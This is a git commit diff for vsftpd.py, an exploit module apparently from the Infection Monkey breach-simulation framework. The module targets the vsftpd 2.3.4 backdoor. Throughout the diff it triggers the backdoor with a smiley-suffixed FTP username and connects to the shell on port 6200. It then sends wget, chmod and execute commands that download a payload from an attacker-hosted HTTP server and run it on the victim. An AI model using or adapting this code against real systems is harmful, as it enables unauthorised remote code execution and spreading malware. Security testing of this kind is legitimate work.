Updated vsftpd.py

This commit is contained in:
Dhayalan 2019-05-22 00:47:26 +02:00
parent 3603d210ff
commit 8d55229ce7
1 changed files with 75 additions and 94 deletions

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@ -7,77 +7,70 @@ from common.utils.exploit_enum import ExploitType
from infection_monkey.exploit import HostExploiter
from infection_monkey.exploit.tools import build_monkey_commandline
from infection_monkey.exploit.tools import get_target_monkey, HTTPTools, get_monkey_depth
from infection_monkey.model import MONKEY_ARG
from infection_monkey.model import MONKEY_ARG, CHMOD_MONKEY, RUN_MONKEY, WGET_HTTP_UPLOAD
from infection_monkey.network.tools import check_tcp_port
from infection_monkey.exploit.web_rce import WebRCE
from logging import getLogger
LOG = getLogger(__name__)
__author__ = 'D3fa1t'
USERNAME = b'USER letmein:)\n'
PASSWORD = b'PASS please\n'
DOWNLOAD_TIMEOUT = 300 # copied from rdpgrinder
FTP_PORT = 21 # port at which vsftpd runs
BACKDOOR_PORT = 6200 # backdoor port
RECV_128 = 128 # In Bytes
UNAME_M = "uname -m"
ULIMIT_V = "ulimit -v " # To increase the memory limit
UNLIMITED = "unlimited;"
USERNAME = b'USER D3fa1t:)\n'# Ftp Username
PASSWORD = b'PASS please\n' # Ftp Password
FTP_TIME_BUFFER = 1 # In seconds
class VSFTPDExploiter(HostExploiter):
_TARGET_OS_TYPE = ['linux']
def __init__(self, host):
def __init__ (self, host):
self._update_timestamp = 0
super(VSFTPDExploiter, self).__init__(host)
self.skip_exist = self._config.skip_exploit_if_file_exist
def socket_connect(s,ip_addr,port):
def socket_connect(self, s, ip_addr, port):
s.connect((ip_addr, port))
return True
except socket.error as e:
LOG.error('Failed to connect to %s' , self.host.ip_addr)
LOG.error('Failed to connect to %s', self.host.ip_addr)
return False
def socket_send_recv(s,message):
def socket_send_recv(self, s, message):
return s.recv(128).decode('utf-8')
return s.recv(RECV_128).decode('utf-8')
except socket.error as e:
LOG.error('Failed to send payload to %s' , self.host.ip_addr)
LOG.error('Failed to send payload to %s', self.host.ip_addr)
return False
def socket_send(s,message):
def socket_send(self, s, message):
return True
except socket.error as e:
LOG.error('Failed to send payload to %s' , self.host.ip_addr)
LOG.error('Failed to send payload to %s', self.host.ip_addr)
return False
def exploit_host(self):
LOG.info('Attempting to trigger backdoor...')
LOG.info("Attempting to trigger the Backdoor..")
ftp_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
if socket_connect(ftp_socket,self.host.ip_addr, FTP_PORT):
if self.socket_connect(ftp_socket, self.host.ip_addr, FTP_PORT):
# Attempt to login to trigger backdoor
if socket_send_recv(ftp_socket,USERNAME):
if socket_send_recv(ftp_socket,PASSWORD):
LOG.info('Triggered backdoor')
LOG.error('Failed to trigger backdoor on %s' , self.host.ip_addr)
return False
if self.socket_send_recv(ftp_socket, USERNAME):
self.socket_send(ftp_socket, PASSWORD)
LOG.info('Backdoor Enabled, Now we can run commands')
LOG.error('Failed to trigger backdoor on %s' , self.host.ip_addr)
return False
@ -85,12 +78,12 @@ class VSFTPDExploiter(HostExploiter):
LOG.info('Attempting to connect to backdoor...')
backdoor_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
if socket_connect(backdoor_socket,self.host.ip_addr, 6200):
if self.socket_connect(backdoor_socket, self.host.ip_addr, BACKDOOR_PORT):
LOG.info('Connected to backdoor on %s:6200', self.host.ip_addr)
command = str.encode("uname -m" + '\n')
uname_m = str.encode(UNAME_M + '\n')
response = self.socket_send_recv(backdoor_socket, uname_m)
response = socket_send_recv(backdoor_socket,command)
if response:
LOG.info('Response for uname -m: %s', response)
if '' != response.lower().strip():
@ -98,66 +91,54 @@ class VSFTPDExploiter(HostExploiter):
self.host.os['machine'] = response.lower().strip()
self.host.os['type'] = 'linux'
else :
LOG.info("Failed to execute command uname -m on victim %r ",self.host)
LOG.info("Failed to execute command uname -m on victim %r ", self.host)
src_path = get_target_monkey(self.host)
LOG.info("src for suitable monkey executable for host %r is %s", self.host,src_path)
LOG.info("src for suitable monkey executable for host %r is %s", self.host, src_path)
if not src_path:
LOG.info("Can't find suitable monkey executable for host %r", self.host)
return False
# copy the monkey into the machine
# Create a http server to host the monkey
http_path, http_thread = HTTPTools.create_locked_transfer(self.host, src_path)
dropper_target_path_linux = self._config.dropper_target_path_linux
LOG.info("Download link for monkey is %s",http_path)
# download the monkey
download_command = '/usr/bin/wget %s -O %s;' % (
http_path, dropper_target_path_linux)
LOG.info("Download_command is %s",download_command)
LOG.info("Download link for monkey is %s", http_path)
# Upload the monkey to the machine
monkey_path = dropper_target_path_linux
download_command = WGET_HTTP_UPLOAD % {'monkey_path': monkey_path, 'http_path': http_path}
download_command = str.encode(str(download_command) + '\n')
if socket_send(backdoor_socket,download_command):
LOG.info("Download command is %s", download_command)
if self.socket_send(backdoor_socket, download_command):
LOG.info('Monkey is now Downloaded ')
LOG.error('Failed to download monkey at %s' , self.host.ip_addr)
LOG.error('Failed to download monkey at %s', self.host.ip_addr)
return False
# changeit to executable
# Change permissions
change_permission = CHMOD_MONKEY % {'monkey_path': monkey_path}
change_permission = str.encode(str(change_permission) + '\n')
LOG.info("change_permission command is %s", change_permission)
Change_exec_permission = "/bin/chmod +x %s" % dropper_target_path_linux
LOG.info("Change_exec_permission is %s",Change_exec_permission)
# Run monkey on the machine
parameters = build_monkey_commandline(self.host, get_monkey_depth() - 1)
run_monkey = RUN_MONKEY % {'monkey_path': monkey_path, 'monkey_type': MONKEY_ARG, 'parameters': parameters}
Change_exec_permission = str.encode(str(Change_exec_permission) + '\n')
if socket_send(backdoor_socket,Change_exec_permission):
LOG.info('Monkey can now be executed ')
# Set unlimited to memory
run_monkey = ULIMIT_V + UNLIMITED + run_monkey
run_monkey = str.encode(str(run_monkey) + '\n')
if backdoor_socket.send(run_monkey):
LOG.info("Executed monkey '%s' on remote victim %r (cmdline=%r)", self._config.dropper_target_path_linux, self.host, run_monkey)
self._exploit_info['Vulnerability'] = {"Success":"True"}
return True
LOG.error('Failed to make the monkey executable at %s' , self.host.ip_addr)
return False
# run the monkey
cmdline = "%s %s" % (self._config.dropper_target_path_linux, MONKEY_ARG)
cmdline += build_monkey_commandline(self.host, get_monkey_depth() - 1)
cmdline += "&"
run_monkey = str.encode(str(cmdline) + '\n')
if socket_send(backdoor_socket,run_monkey):
LOG.info("Executed monkey '%s' on remote victim %r (cmdline=%r)",
self._config.dropper_target_path_linux, self.host, cmdline)
LOG.error('Monkey failed to run at %s' , self.host.ip_addr)
return False
self._exploit_info['Vulnerability'] = {"Success":"True"}
return True